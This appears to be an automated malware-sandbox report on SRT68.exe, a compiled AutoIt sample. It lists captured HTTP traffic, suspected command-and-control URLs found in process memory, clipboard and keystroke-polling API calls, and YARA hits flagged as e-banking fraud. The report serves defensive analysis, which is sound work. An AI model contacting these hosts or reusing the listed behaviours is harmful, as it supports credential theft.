                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:51 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:46:54 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:47:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea a7 b7 df b8 f8 da a5 d7 b6 cf 58 a7 f6 1c af e3 ef 99 51 20 ed c1 16 0f 78 cb 97 1d d1 10 dd b1 67 47 8e ef 55 aa d7 f6 37 4e 59 67 76 76 9a 67 ac ba 95 12 49 89 09 df 73 31 bc 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 78 15 04 7e f0 94 13 6a 62 1d 73 c2 c0 6e 94 8a 84 a0 97 4c cf e3 a8 cb 7a 7e 66 be c8 68 a0 3a 92 48 f8 d4 bc cd 4f 2a f2 37 d7 b7 8a 47 4b 5b 6c db ef 4c 32 db 6e 1b 23 e8 4a e8 af 16 a9 af 95 da 2b b7 b1 e5 4e 9f 5a ed 5e cb 75 7a fd 08 f6 40 b4 54 50 a4 c3 83 5b ad b4 83 48 ce b4 68 ea a9 d5 77 9c dd a5 53 0d cf 8f 88 a5 48 5d c1 42 f1 d7 f1 71 fc 28 3e 8c 1f 8b f8 bb f8 20 f9 10 8f f7 e2 a3 e4 a3 e4 06 9e 8f f0 77 1c df 8d 0f a8 fb ee 9a d7 0e 47 1b 75 f8 a3 f6 dc b6 41 56 9b d9 6a 3f 8a 46 e1 05 cb 82 fb 99 70 60 ed 0c 9e df f5 5d d7 df 13 9e ef 8f 14 ac 04 0f f0 03 58 8b 0a 60 cf 32 e8 91 5b b7 da f0 fb 01 98 f9 2b ad 6e 26 1f 26 37 eb 96 6c d6 2d ec a3 59 9f db 4c 4f b5 5a a9 af 1b 7b 81 1c 8d 40 34 15 f0 7c 7b 8b 7d b1 05 5f 00 30 2c 1d c4 6a e9 fb f0 6b af 67 84 91 84 7f 43 01 73 ab ce c8 da 48 d7 27 3d ad 4f a5 31 a7 11 83 a1 a1 b4 14 39 fa eb cd fa 68 f9 ec 8e d2 76 0c 67 7d 76 6d d5 db 41 33 3e d2 0a 8b 7f 20 4d c6 3f b0 76 1f 9c d0 e7 8c d0 47 cb 36 de 1e 47 91 ef 85 99 c4 b1 f3 82 19 e8 4e 70 a9 1f a0 06 d7 0f 5a ac 67 e5 d9 64 6c 69 47 e8 5c 55 2d 58 c0 50 ba ac 8e 54 aa f9 fc 5c 82 e9 78 56 0d 70 b9 40 62 24 3b 1d 28 aa e5 92 ed cc db 1e 81 b4 b6 3f 6b af ef 3b a1 b5 69 f7 95 3d 68 ac 75 38 58 2c c6 f0 35 39 1c 6d 60 56 2b f4 c7 81 ad 1a 19 13 84 ce a5 e6 6f 88 0e 59 a3 28 ee 98 9c a7 b8 03 86 ef 82 4f ae de 51 c7 1f 4a 27 07 f9 cc 71 0a cc eb 01 96 a7 f6 ac cd 71 34 cc 38 5b c2 3f 8d a0 48 33 1e 66 bc af 51 93 8d 7d 49 a7 e7 35 42 08 cb eb b4 40 6d f5 56 e3 bf c3 38 fe 13 1f 8a e4 93 f8 38 f9 34 b9 29 e2 fb 19 3a 9c 2e 38 64 38 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:47:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea a7 b7 df b8 f8 da a5 d7 b6 cf 58 a7 f6 1c af e3 ef 99 51 20 ed c1 16 0f 78 cb 97 1d d1 10 dd b1 67 47 8e ef 55 aa d7 f6 37 4e 59 67 76 76 9a 67 ac ba 95 12 49 89 09 df 73 31 bc 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 78 15 04 7e f0 94 13 6a 62 1d 73 c2 c0 6e 94 8a 84 a0 97 4c cf e3 a8 cb 7a 7e 66 be c8 68 a0 3a 92 48 f8 d4 bc cd 4f 2a f2 37 d7 b7 8a 47 4b 5b 6c db ef 4c 32 db 6e 1b 23 e8 4a e8 af 16 a9 af 95 da 2b b7 b1 e5 4e 9f 5a ed 5e cb 75 7a fd 08 f6 40 b4 54 50 a4 c3 83 5b ad b4 83 48 ce b4 68 ea a9 d5 77 9c dd a5 53 0d cf 8f 88 a5 48 5d c1 42 f1 d7 f1 71 fc 28 3e 8c 1f 8b f8 bb f8 20 f9 10 8f f7 e2 a3 e4 a3 e4 06 9e 8f f0 77 1c df 8d 0f a8 fb ee 9a d7 0e 47 1b 75 f8 a3 f6 dc b6 41 56 9b d9 6a 3f 8a 46 e1 05 cb 82 fb 99 70 60 ed 0c 9e df f5 5d d7 df 13 9e ef 8f 14 ac 04 0f f0 03 58 8b 0a 60 cf 32 e8 91 5b b7 da f0 fb 01 98 f9 2b ad 6e 26 1f 26 37 eb 96 6c d6 2d ec a3 59 9f db 4c 4f b5 5a a9 af 1b 7b 81 1c 8d 40 34 15 f0 7c 7b 8b 7d b1 05 5f 00 30 2c 1d c4 6a e9 fb f0 6b af 67 84 91 84 7f 43 01 73 ab ce c8 da 48 d7 27 3d ad 4f a5 31 a7 11 83 a1 a1 b4 14 39 fa eb cd fa 68 f9 ec 8e d2 76 0c 67 7d 76 6d d5 db 41 33 3e d2 0a 8b 7f 20 4d c6 3f b0 76 1f 9c d0 e7 8c d0 47 cb 36 de 1e 47 91 ef 85 99 c4 b1 f3 82 19 e8 4e 70 a9 1f a0 06 d7 0f 5a ac 67 e5 d9 64 6c 69 47 e8 5c 55 2d 58 c0 50 ba ac 8e 54 aa f9 fc 5c 82 e9 78 56 0d 70 b9 40 62 24 3b 1d 28 aa e5 92 ed cc db 1e 81 b4 b6 3f 6b af ef 3b a1 b5 69 f7 95 3d 68 ac 75 38 58 2c c6 f0 35 39 1c 6d 60 56 2b f4 c7 81 ad 1a 19 13 84 ce a5 e6 6f 88 0e 59 a3 28 ee 98 9c a7 b8 03 86 ef 82 4f ae de 51 c7 1f 4a 27 07 f9 cc 71 0a cc eb 01 96 a7 f6 ac cd 71 34 cc 38 5b c2 3f 8d a0 48 33 1e 66 bc af 51 93 8d 7d 49 a7 e7 35 42 08 cb eb b4 40 6d f5 56 e3 bf c3 38 fe 13 1f 8a e4 93 f8 38 f9 34 b9 29 e2 fb 19 3a 9c 2e 38 64 38 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 08:47:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 61 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 8f db c6 15 7e f7 af 18 ab c0 4a b2 45 32 9b 14 81 ed 95 b4 4d e2 f4 29 97 02 eb b4 28 36 1b 61 44 8d 24 5a 14 a9 92 d4 ae 65 7b 81 c4 4e 9a 04 31 62 34 0d 50 20 68 d0 1b 8a 3e 15 58 5f b6 d9 f8 b2 f9 0b e4 3f ea 77 ce 90 14 a5 95 e4 4b 9c a2 02 76 45 cd e5 cc 99 73 f9 ce 39 33 ac 9f ee f8 76 34 19 29 d1 8f 86 6e b3 4e ff 85 ed ca 30 6c 94 9c b0 25 3b 72 14 39 bb aa 24 5c e9 f5 1a a5 60 5c c2 18 25 3b cd fa 50 45 52 d8 7d 19 84 2a 6a 94 de bb f4 4b e3 1c fa b8 d5 93 43 d5 28 8d 64 30 70 bc 5e 49 d8 be 17 29 0f 83 02 d5 0b c6 46 00 9a b3 23 77 1d b5 37 f2 83 a8 30 74 cf e9 44 fd 46 47 ed 3a b6 32 f8 47 cd f1 9c c8 91 ae 11 da d2 55 8d 75 90 88 9c c8 55 cd bd bd 3d b3 2b bd 48 86 91 63 4b b3 e3 f4 9c 48 ba 75 4b f7 d6 5d c7 1b 88 40 b9 8d 52 18 4d 5c 15 f6 95 c2 42 43 d5 71 64 a3 24 5d b7 24 fa 81 ea e6 ec 32 7b 86 1c 47 be 69 87 21 16 99 ce 77 b0 91 6c 74 57 82 33 df 33 f1 6f 73 bd 24 48 82 10 d8 50 f6 94 75 c5 e0 81 cd 7a 68 07 ce 28 6a 5a 67 ea a7 b7 df b8 f8 da a5 d7 b6 cf 58 a7 f6 1c af e3 ef 99 51 20 ed c1 16 0f 78 cb 97 1d d1 10 dd b1 67 47 8e ef 55 aa d7 f6 37 4e 59 67 76 76 9a 67 ac ba 95 12 49 89 09 df 73 31 bc 51 5a 4c a6 52 b6 86 d2 73 ba 2a 8c cc cb 61 b9 5a c2 78 15 04 7e f0 94 13 6a 62 1d 73 c2 c0 6e 94 8a 84 a0 97 4c cf e3 a8 cb 7a 7e 66 be c8 68 a0 3a 92 48 f8 d4 bc cd 4f 2a f2 37 d7 b7 8a 47 4b 5b 6c db ef 4c 32 db 6e 1b 23 e8 4a e8 af 16 a9 af 95 da 2b b7 b1 e5 4e 9f 5a ed 5e cb 75 7a fd 08 f6 40 b4 54 50 a4 c3 83 5b ad b4 83 48 ce b4 68 ea a9 d5 77 9c dd a5 53 0d cf 8f 88 a5 48 5d c1 42 f1 d7 f1 71 fc 28 3e 8c 1f 8b f8 bb f8 20 f9 10 8f f7 e2 a3 e4 a3 e4 06 9e 8f f0 77 1c df 8d 0f a8 fb ee 9a d7 0e 47 1b 75 f8 a3 f6 dc b6 41 56 9b d9 6a 3f 8a 46 e1 05 cb 82 fb 99 70 60 ed 0c 9e df f5 5d d7 df 13 9e ef 8f 14 ac 04 0f f0 03 58 8b 0a 60 cf 32 e8 91 5b b7 da f0 fb 01 98 f9 2b ad 6e 26 1f 26 37 eb 96 6c d6 2d ec a3 59 9f db 4c 4f b5 5a a9 af 1b 7b 81 1c 8d 40 34 15 f0 7c 7b 8b 7d b1 05 5f 00 30 2c 1d c4 6a e9 fb f0 6b af 67 84 91 84 7f 43 01 73 ab ce c8 da 48 d7 27 3d ad 4f a5 31 a7 11 83 a1 a1 b4 14 39 fa eb cd fa 68 f9 ec 8e d2 76 0c 67 7d 76 6d d5 db 41 33 3e d2 0a 8b 7f 20 4d c6 3f b0 76 1f 9c d0 e7 8c d0 47 cb 36 de 1e 47 91 ef 85 99 c4 b1 f3 82 19 e8 4e 70 a9 1f a0 06 d7 0f 5a ac 67 e5 d9 64 6c 69 47 e8 5c 55 2d 58 c0 50 ba ac 8e 54 aa f9 fc 5c 82 e9 78 56 0d 70 b9 40 62 24 3b 1d 28 aa e5 92 ed cc db 1e 81 b4 b6 3f 6b af ef 3b a1 b5 69 f7 95 3d 68 ac 75 38 58 2c c6 f0 35 39 1c 6d 60 56 2b f4 c7 81 ad 1a 19 13 84 ce a5 e6 6f 88 0e 59 a3 28 ee 98 9c a7 b8 03 86 ef 82 4f ae de 51 c7 1f 4a 27 07 f9 cc 71 0a cc eb 01 96 a7 f6 ac cd 71 34 cc 38 5b c2 3f 8d a0 48 33 1e 66 bc af 51 93 8d 7d 49 a7 e7 35 42 08 cb eb b4 40 6d f5 56 e3 bf c3 38 fe 13 1f 8a e4 93 f8 38 f9 34 b9 29 e2 fb 19 3a 9c 2e 38 64 38 9
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://expired.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://vpnto.net
                Source: odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.00000000042DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6ME
                Source: VdxisCThGA.exe, 00000006.00000002.3837691374.0000000005242000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fantastica.digital
                Source: VdxisCThGA.exe, 00000006.00000002.3837691374.0000000005242000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fantastica.digital/5srj/
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.i7.ru/
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://expired.ru
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i7.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i7.ru/domains/
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://i7.ru/domains/#domreg
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ipaddress.ru
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://job.i7.ru
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: odbcconf.exe, 00000004.00000003.1684020923.0000000007F07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: odbcconf.exe, 00000004.00000002.3834317306.000000000322F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: odbcconf.exe, 00000004.00000002.3834317306.000000000322F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://myssl.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://proxyspot.com
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois7.ru
                Source: odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois7.ru/?q=vpnto.net
                Source: odbcconf.exe, 00000004.00000002.3836668787.00000000059B6000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003326000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bfyer.com?id=84562
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: odbcconf.exe, 00000004.00000002.3836668787.00000000064B4000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003E24000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01014164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01014164
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01014164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01014164
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01013F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01013F66
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0100001C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0102CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0102CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3834195003.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3833825431.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3835727980.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489414299.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1488635297.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3835430269.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1489460916.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\SRT68.exeCode function: This is a third-party compiled AutoIt script.0_2_00FA3B3A
                Source: SRT68.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SRT68.exe, 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_76896b17-1
                Source: SRT68.exe, 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_23dfe4e6-5
                Source: SRT68.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_34ed5190-b
                Source: SRT68.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f25c968a-3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C593 NtClose,2_2_0042C593
